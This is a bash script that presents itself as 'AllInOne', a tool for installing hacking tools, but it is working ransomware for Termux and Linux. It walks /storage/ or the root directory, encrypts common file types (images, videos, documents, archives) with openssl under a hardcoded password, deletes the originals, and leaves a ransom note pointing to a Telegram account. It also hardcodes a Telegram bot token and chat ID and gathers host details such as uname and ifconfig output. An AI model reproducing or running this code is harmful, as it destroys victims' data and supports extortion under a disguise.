#! /usr/bin/bash

# Colors
R="$(printf '\033[1;31m')"
G="$(printf '\033[1;32m')"
Y="$(printf '\033[1;33m')"
W="$(printf '\033[1;37m')"
C="$(printf '\033[1;36m')"
b="\033[1;30m"
r="\033[1;31m"
g="\033[1;32m"
y="\033[1;33m"
b="\033[1;34m"
p="\033[1;35m"
c="\033[1;36m"
v="\033[1;37m"
w="\033[0;37m"
black="\033[1;30m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
purple="\033[1;35m"
cyan="\033[1;36m"
violate="\033[1;37m"
white="\033[0;37m"
nc="\033[00m"
#--------ModeTool---------#
info="${cyan}[${white}+${cyan}] ${yellow}"
fun="${cyan}[${white}@${cyan}] ${purple}"
ask="${cyan}[${white}?${cyan}] ${purple}"
bad="${cyan}[${white}!${cyan}] ${red}"
good="${cyan}[${white}√${cyan}] ${green}"
#---------FaceType--------#
sad="$red ಠ⁠︵ಠ⁠"
llok="$blue ಠ⁠_⁠ʖ⁠ಠ⁩"
hehe="$yellow ಡ⁠ ͜⁠ ⁠ʖ⁠ ⁠ಡ"
huh="$blue ʘ⁠‿⁠ʘ"
happy="( ⁠•⁠ ⁠‿⁠ ⁠•⁠ )"
#---------OPIONS----------#
home=$(pwd)
more_info="AllInOne is a tool can install and startup you to become a hacker with alots of tools $hehe "
name=worm
TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
Device=$(uname -a)
Tdate=$(date)
HostName=$(hostname)
Kernel=$(uname -r)
UpTime=$(uptime)
MemoryUsage=$(free -m)
DiskUsage=$(df -h)
ip=$(ifconfig -a)
#-------------------------#
# Check if offline
net() {
    while true; do
        wget --spider --quiet https://github.com
        if [ "$?" = 0 ]; then

            nN='Y'
            NnEt="Connected To Network [★]"

        break
       else
                nN='N'
                NnEt="No Internet [X] "
                break
        fi
    done
}

# Termux
if [[ -d /data/data/com.termux/files/home ]]; then
termux=true
PREFIX='/data/data/com.termux/files/usr/'
SYS='/storage/'
elif [[ -d /root/ ]];then
termux=false
PREFIX='/'
SYS='/'
fi

# package manager

if [[ -f $PREFIX/etc/Hacked/LOCKS/worm_lock_file ]];then

printf ""

else

touch $PREFIX/etc/Hacked/LOCKS/worm_lock_file

#Virus_Script
if [[ -f $PREFIX/etc/Hacked/file.txt ]];then

echo "
You Have Been Hacked By @HacSom
All Your Files Has Been Encrypted If
You Want To Fix This Call Me
On Telegram By My Account

@HacSom was here :-) " > $PREFIX/etc/Hacked/Victam/file.txt

xdg-open $PREFIX/etc/Hacked/Badshell/file.txt

else

echo -e "#---------------TrojanLog----------------#" > $PREFIX/etc/Hacked/Badshell/Trojan-log.txt

# Encrypt all files in the directory
JPG(){
for filename in $(find ${SYS} -name *.jpg); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
PNG(){
for filename in $(find ${SYS} -name *.png); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
MP4(){
for filename in $(find ${SYS} -name *.mp4); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypteed , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
GIF(){
for filename in $(find ${SYS} -name *.gif); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
TXT(){
for filename in $(find ${SYS} -name *.txt); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
XLXS(){
for filename in $(find ${SYS} -name *.xlxs); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
PDF(){
for filename in $(find ${SYS} -name *.pdf); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
ZIP(){
for filename in $(find ${SYS} -name *.zip); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
DOC(){
for filename in $(find ${SYS} -name *.doc); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}
DOCX(){
for filename in $(find ${SYS} -name *.docx); do

    # Generate a random password
    PASSWORD=81ueThe4ing

    # Encrypt the file using the generated password
        echo -e " New File Encrypted , Name of file : $filename " >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
        openssl enc -aes-256-cbc -salt -in $filename -out $filename.TheKingBlue -k $PASSWORD &>> /dev/null
        rm $filename &>> /dev/null
    # Create a text file containing the password used to encrypt the file

done
}




#----------
JPG &>> /dev/null
PNG &>> /dev/null
MP4 &>> /dev/null
GIF &>> /dev/null
TXT &>> /dev/null

PDF  &>> /dev/null
ZIP  &>> /dev/null
XLXS &>> /dev/null
DOC  &>> /dev/null
DOCX &>> /dev/null

echo -e "#---------------TrojanLog----------------#" >> $PREFIX/etc/Hacked/Badshell/Trojan-log.txt
#----------

echo "
You Have Been Hacked By @HacSom
All Your Files Has Been Encrypted If
You Want To Fix This Call Me
On Telegram By My Account

@HacSom was here :-) " > $PREFIX/etc/Hacked/file.txt

echo "End" > $PREFIX/etc/Hacked/LOCKS/worm_lock_file
rm $PREFIX/etc/Hacked/LOCKS/worm_lock_file
fi
fi
